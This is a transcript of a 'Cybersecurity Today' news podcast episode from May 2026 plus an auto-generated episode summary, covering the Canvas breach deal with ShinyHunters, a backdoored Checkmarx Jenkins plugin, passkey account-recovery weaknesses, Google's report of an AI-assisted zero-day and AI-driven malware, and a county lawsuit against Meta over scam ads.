
Loading summary
A
Instructure cuts deal with Shiny Hunters Check marks hit again in another supply chain attack, Microsoft and Google warn passkeys are not a security silver bullet and Google reports its first evidence of hostile use of AI to develop a zero day this is Cybersecurity Today and I'm your host David Shipley. Lets get started. Instructure, the company behind the massively breached learning platform Canvas, has officially used the word agreement to describe its new arrangement with the criminal group Shiny Hunters. In a statement on Tuesday, Instructure confirmed it has reached what it's calling an agreement with the threat actor responsible for the Canvas breach. The Canvas breach affects as many as 9,000 schools worldwide and as many as 275 million people, according to Bleeping Computer. The company says Shiny Hunters has returned the stolen data and provided what Instructure calls shred logs confirming its destruction. The agreement covers all impacted customers. The company says no one will need to negotiate separately and no individual customer will be extorted as a result of this incident. It's worth noting that an agreement with a criminal organization is hardly a binding guarantee. At best, it's a talking point. Shiny Hunters can keep a copy of the data, sell it tomorrow, or come back in six months under a different name and and no court, regulator or insurer can enforce anything against them. What the agreement actually is is likely a line in Instructure's legal defense that its lawyers will use in civil suits that are likely already being developed. One useful new technical detail in Bleeping computers reporting the breach was enabled by multiple cross site scripting vulnerabilities, also known as XSS flaws. And in Canvas's user generated content features, Shiny Hunters injected malicious JavaScript to let them hijack authenticated administrative sessions and perform privileged actions inside the platform. It was the same vulnerability class for both the April 29 data theft and the May 7 defacement. Instructure is hosting a webinar today to share more about what they've done to secure their platform going forward. The longer term question now is what message this move sends to the next Shiny Hunters affiliate or similar gang looking to attack the next edtech platform. And that sign likely reads something like open season. As we noted on Monday, Shiny Hunters is a young opportunistic group. They watch what works, and what worked here was breach the platform, deface the login pages, make the threat public, and walk away with a deal. Criminal hackers are mocking software security firm checkmarks after breaching the company for the third time in seven weeks, according to Bleeping computer A malicious version of Checkmarks Jenkins application security testing plugin was published to the Jenkins Marketplace on Saturday, May 9. Jenkins is one of the world's most widely deployed automation platforms in software engineering. It builds, tests and deploys code across an enormous portion of the world's software supply chain. The Checkmarks AST plugin sits inside that pipeline, scanning code for vulnerabilities. As it's built, that plugin was itself backdoored to deliver credential stealing malware. The group behind the breach calls itself Team pcp. We've been talking about them a lot this year. The same group also claimed responsibility for the Shai Hulud campaign on the NPM package Registry and the massive Trivi Vulnerability scanner breach back in March. And it looks like the Trivi breach attack explains this latest breach. A Checkmark spokesperson confirmed to Bleeping Computer that Team PCP got Into the company's GitHub repository using credentials stolen during the Trivia attack. They used it to publish malicious versions of Checkmark's Kicks analysis tool to Docker OpenVSX and VS code in April and now in May, they've published a rogue version of the Jenkins plugin using the same access approach. The attackers even left a taunt in the repository's about section, needling the company for for not rotating its secrets properly. The malicious version is labeled as August 2, 2026.5.09 if you've downloaded the Jenkins AST plugin from Checkmarks in the past week, assume your credentials are compromised. Rotate everything and hunt for lateral movement. If credentials stolen from one vendor can be reused again to attack another vendor weeks later, the credential rotation gap across the security supply chain is clearly the soft target, and right now that gap is wide enough to drive three breaches through in less than two months. Another cybersecurity silver bullet just bit the dust. This time it's passkeys, the so called phishing resistant authentication standard that was supposed to make passwords obsolete and put a serious dent in account takeover attacks. Google and Microsoft both issued new warnings this week that passkeys on their own are not the complete defense some in the industry have been promoting. Microsoft put the point plainly. Each account is only as secure as its weakest credential, even on accounts where you've deployed passkeys. If any weaker credential or recovery method remains attached a password, an SMS code, a security question, that weaker option is now the attack surface. Attackers will simply ignore the passkey and target the recovery flow instead. According to Forbes coverage of the joint warning. Google's specific guidance is that even when you normally use a passkey, you still need two step verification turned on. The reasoning is straightforward. Someone can impersonate you, claim to have lost the passkey and ride the account recovery process back into your account. The takeaway for individual users is clear. Stop relying on SMS one time codes wherever you can as your second factor. Both Google and Microsoft are pushing people towards authenticator apps that they both offer and device based confirmations. Instead, Microsoft on the enterprise side is recommending that high assurance account recovery require a government issued ID and a face scan, which is where NIST has been for a while. But here's the broader point worth taking from all this. Passkeys are good. They're meaningfully better than passwords, many of which are reused by people. The pitch around them though has consistently over promised that adoption alone would solve the credential problem that was always going to break down in the corner cases. And the corner cases are where attackers live. Corner cases like ease of use and multi device functionality or as noted by Google and Microsoft, the issues around account recovery. This is a recurring lesson for the entire cybersecurity field. There is no single technology that defends an account or an organization end to end on its own. There are no silver bullets. The best defense is always layered strong technology paired with informed, motivated people along with strong process and the assumption that every single control could and will likely fail on its own. It was never going to be one solution or the other, and it never will be. For the first time, Google's Threat Intelligence Group, also known as gtig, has confirmed a threat actor using a zero day exploit they believe was developed with the help of AI. The vulnerability was a two factor authentication bypass in a popular open source server administration tool. A criminal threat actor was preparing to use it in a mass exploitation event. GTIG's proactive research caught it first and they worked with the vendor to responsibly disclose and patch the flaw before it could be deployed at scale. GTIG published the findings in a major update on Monday on how adversaries are using AI. It's not about the evolution of hacking, it's about industrialization. The reason GTIG believes AI generated this exploit is in a single smoking gun, its fingerprints. The Python script contained educational doc strings, a hallucinated CVSS score, and the kind of clean structured textbook pythonic formatting that characterizes a lot of large language model output. More importantly, the vulnerability itself was a high level semantic logic flaw, a hard coded trust assumption that developers had left in the code. That's the type of bug that Modern Frontier LLMs are showing they are increasingly good at spotting through contextual reasoning and that traditional security tools like fuzzers and static analysis don't see. Google says state sponsored hackers are industrializing their efforts with AI. GTIG observed actors associated with China and North Korea, including a group called APT45, sending thousands of repetitive prompts to recursively analyze CVEs and validate proof of concepts at a scale that would be impractical to manage manually. One PRC aligned group is priming AI models with a Knowledge base of 85,000 Real world vulnerability cases from a now defunct Chinese bug bounty platform, effectively turning the model into a specialized vulnerability researcher. On the malware side, the most striking discovery is a backdoor called PromptSpy. It's an Android malware family that uses the Gemini API to autonomously navigate the device's user interface. It serializes what's on screen, sends it to the model and gets back step by step click and swipe instructions and executes those. It can also capture biometric authentication gestures and and replay them again if the user logs out. Google has disabled the assets associated with this threat actor, and here's a thread that ties back to the checkmark story earlier in the episode. The group Google tracks as UNC6780, better known publicly as Team PCP, was not just behind the Trivi and check mark supply chain attacks. GTIG confirms they also compromised Light LLM and Barry AI, two open source AI gateway tools that organizations use to integrate multiple LLM providers into their own applications. Cisco cited both lightllm and Trivi in its recent loss of source code. It's all the same Playbook, Trojanized packages, malicious pull requests, credential stealers harvesting cloud secrets from build environments. The stolen credentials then get sold to extortion crews. GTIG also documented Russia linked information operations using AI voice cloning to impersonate real journalists, Russian aligned malware using LLM generated junk code to evade detection and a maturing underground ecosystem of middleware tools, proxy aggregators and antidetection browsers giving threat actors anonymized premium tier access to commercial AI at Scale 2 reports in the same week the Dragos brief Monday and this GTIG update converge on a critical observation. AI is becoming a normal part of how attackers work. It's making average attackers more capable. It's making capable attackers faster. The legal pressure on Meta over scam advertising just got bigger, according to Reuters, Santa Clara county in California has filed suit against Meta in a state superior court alleging the company has profited from Facebook and Instagram ads promoting scams in violation of California's false advertising and unfair business practices laws. The county is suing on behalf of all California residents, citing leaked internal Meta documents. First reported by Reuters last year, Santa Clara alleges Meta earned as much as $7 billion in annual revenue from what the company itself reportedly classifies as high risk scam ads, ads that show clear signs of being fraudulent. The total haul Meta is alleged to have made in 2024 from likely scam ads? As much as 16 billion. The lawsuit further alleges Meta established internal guardrails to block scam reduction efforts that would have cost the company too much money. Meta says it intends to defend itself, calling the underlying Reuters reporting a distortion of its motives and pointing to the company's anti scam efforts on and off the platform. This isn't the first action of its kind. We reported in April that the Consumer Federation of America filed suit against meta in Washington, D.C. last month over the same issues, alleging violations of D.C. consumer protection law. Before that, the U.S. virgin Islands Attorney General office filed a separate suit, which, among other things, alleges Meta charged advertisers higher rates to run ads flagged as likely to be fraudulent. As we noted in earlier coverage, scam ads have become a key part of the phishing funnel. And if you missed last Friday's special episode, we chatted with Aaron West, a former prosecutor in Santa Clara county and the founder of the global anti scam group Operation Shamrock. She had some important things to say about Meta's role in the scam epidemic. That's Cybersecurity today for Wednesday, May 13, 2026. We appreciate all of your feedback. Feel free to leave us a comment under the YouTube video or to drop by technewsday.com or CA and send us a note. Thank you to everyone who has been leaving ratings or reviews on their favorite podcast platforms. Please keep it up. It really helps us reach more people and it really makes our day. Jim Love will be back on the news desk on Friday. I'll be back on Monday with the latest headlines.
Episode: Canvas Breach 'Deal' With ShinyHunters, AI Zero-Day Warning, Checkmarx Hit Again
Host: David Shipley (guest host for Jim Love)
Date: May 13, 2026
Main Theme:
Critical developments in cybersecurity: the Canvas data breach and unprecedented “agreement” with ShinyHunters, repeated attacks on Checkmarx and the dangers of supply chain gaps, the limits of passkey security, evidence of AI-developed zero-day exploits, advanced AI-powered threat methodologies, and a new lawsuit against Meta for scam advertising.
[00:30–05:00]
"An agreement with a criminal organization is hardly a binding guarantee. At best it's a talking point." (02:03)
"ShinyHunters can keep a copy of the data, sell it tomorrow, or come back in six months... No court, regulator or insurer can enforce anything against them." (02:13)
"The longer-term question now is what message this move sends to the next ShinyHunters affiliate or similar gang looking to attack the next edtech platform. And that sign likely reads something like open season." (03:24)
[05:01–10:45]
"The attackers even left a taunt in the repository's about section, needling the company for not rotating its secrets properly." (09:12)
"If credentials stolen from one vendor can be reused again to attack another vendor weeks later, the credential rotation gap across the security supply chain is clearly the soft target, and right now that gap is wide enough to drive three breaches through in less than two months." (10:35)
[10:46–15:45]
"Each account is only as secure as its weakest credential, even on accounts where you’ve deployed passkeys." (11:51)
"Passkeys are good. They're meaningfully better than passwords... The pitch around them though has consistently overpromised that adoption alone would solve the credential problem... And the corner cases are where attackers live." (14:24)
"There are no silver bullets. The best defense is always layered strong technology paired with informed, motivated people along with strong process..." (15:00)
[15:46–20:55]
"The Python script contained educational doc strings, a hallucinated CVSS score, and the kind of clean structured textbook pythonic formatting that characterizes a lot of large language model output." (17:05)
"One PRC aligned group is priming AI models with a knowledge base of 85,000 real world vulnerability cases... effectively turning the model into a specialized vulnerability researcher." (19:15)
"It's all the same playbook: Trojanized packages, malicious pull requests, credential stealers harvesting cloud secrets from build environments." (21:30)
"AI is becoming a normal part of how attackers work. It’s making average attackers more capable. It’s making capable attackers faster." (23:15)
[20:56–23:45]
On 'deals' with hackers:
"An agreement with a criminal organization is hardly a binding guarantee. At best, it’s a talking point." (02:03) "...what worked here was breach the platform, deface the login pages, make the threat public, and walk away with a deal." (04:01)
On supply chain credential gaps:
"Credential rotation gap across the security supply chain is clearly the soft target, and right now that gap is wide enough to drive three breaches through in less than two months." (10:35)
On passkey hype:
"There are no silver bullets. The best defense is always layered strong technology paired with informed, motivated people along with strong process and the assumption that every single control could and will likely fail on its own." (15:00)
On AI’s threat capabilities:
"It's not about the evolution of hacking, it’s about industrialization." (17:13)
"AI is becoming a normal part of how attackers work... It’s making capable attackers faster." (23:15)
This episode paints a picture of modern cybersecurity: no single solution is sufficient, AI is rapidly industrializing cyberattacks, supply chains remain dangerously exposed, and legal and ethical boundaries are being repeatedly tested. The host’s tone is pragmatic and direct, framing each breach or technology trend as a lesson for both defenders and decision-makers.
Actionable Takeaways: